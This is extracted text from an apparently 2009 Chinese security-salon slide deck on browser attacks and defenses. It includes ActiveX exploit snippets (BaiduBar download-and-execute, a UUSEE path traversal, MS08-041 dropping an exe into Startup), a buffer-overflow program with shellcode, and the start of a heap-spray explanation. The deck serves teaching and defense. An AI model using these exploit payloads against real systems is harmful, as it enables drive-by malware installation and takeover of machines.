浅谈浏览器s的攻击与范围课件.ppt

行为分析 修改系统文件 写文件 创建文件 写注册表 创建进程 加载驱动程序 加载系统DLL文件 异常的内存分配 谢谢 总结 浏览器的安全形势 各种浏览器攻击方式 各种攻击方式的防护 QA 51CTO安全技术沙龙 * 51CTO安全技术沙龙 浅谈浏览器的攻击与防护 2009-4-25 浏览器安全形势 系统本身漏洞减少，第三方漏洞增加 浏览器成为攻击的主要目标 中国电脑用户受到的基于浏览器的攻击次数高居全球之首 360安全卫士日拦截千万次网站挂马攻击(2009年3月数据） 2009年2月10日、2月19日、3月11日 页面访问量每天接近100万 4月21日辽宁电信 持续超过60小时 瑞丽女性 3月22日 日访问量350万左右 大量政府网站和高校网站被挂马 攻击的危害 恶作剧 帐号被盗 首页被改 被黑客控制 虚拟货币转帐 用户的身份资料修改、盗取 短消息，EMAIL、SPAM等等 浏览器攻击类型 浏览器自身缺陷 XML 0day MS08078、 DataSpace MS06014 第三方插件漏洞 Flash、超星、BaiduBar 第三方软件漏洞 Realplayer、PDFReader 脚本漏洞:不会重点讲述 XSS、CSRF 不仅是IE受到攻击 IE、FF、Chrome Maxthon、TT、Theworld WinRAR 路由器 CSRF 手机浏览器 漏洞的利用方式 利用COM组件自身的缺陷功能 利用堆喷射方式攻击的溢出漏洞 利用COM组件传递溢出参数到本地软件 IE浏览器自身跨域脚本型漏洞 特殊的第三方软件的文件格式溢出 COM自身漏洞1 百度Bar漏洞 BaiduBar.dll（ 44） DloadDS函数提供三个参数，分别是url地址，执行文件名，和是否显示。当url以.cab结尾时，搜霸会下载此文件到临时目录，随后以exe方式执行。 obj.DloadDS(http::///xxx.exe, bd.exe, 0); COM自身漏洞2 UUSEE UUUpgrade.ocx 2 object classid=clsid:2CACD7BB-1C59-4BBB-8E81-6E83F82C813B id=target /object script language=vbscript arg1=/../../Program Files/Common Files/uusee/exp.ini arg2=/UUUpgrade.ini arg3=fool arg4=1 target.Update arg1 ,arg2 ,arg3 ,arg4 /script COM自身漏洞3 Snapshot Viewer 任意文件下载漏洞(MS08-041) object classid=clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9 id=obj/object script language=javascript var buf1 = /xxx.exe; var buf2 = C:/Documents and Settings/All Users/「开始」菜单/程序/启动/test.exe; obj.SnapshotPath = buf1; obj.CompressedPath = buf2; obj.PrintSnapshot(); /script /html ldap:// c:/Program Files/Outlook Express/wab.exe 堆喷射攻击 缓冲区溢出 #include string.h void test(char *in){ char buf[8]={0}; strcpy(buf,in); } void main(){ char aaa[]= \x12\x45\xfa\x7f//JMP ESP \xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x48\x49 \x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x4a ............. \x48\x7a\x38\x4b\x4e\x4e\x6a\x36\x6e\x41\x47\x6b\x4f\x38\x67\x70 \x63\x42\x41\x30\x6c\x51\x73\x33\x30\x4a; test(aaa); } 示例程序 堆喷射攻击 用JavaScript脚本创建了很多个string对象，在string对象中写入一个长长的NOP链以及紧接着NOP链的一小段shellcode。 JavaScript runtime会把这些string对象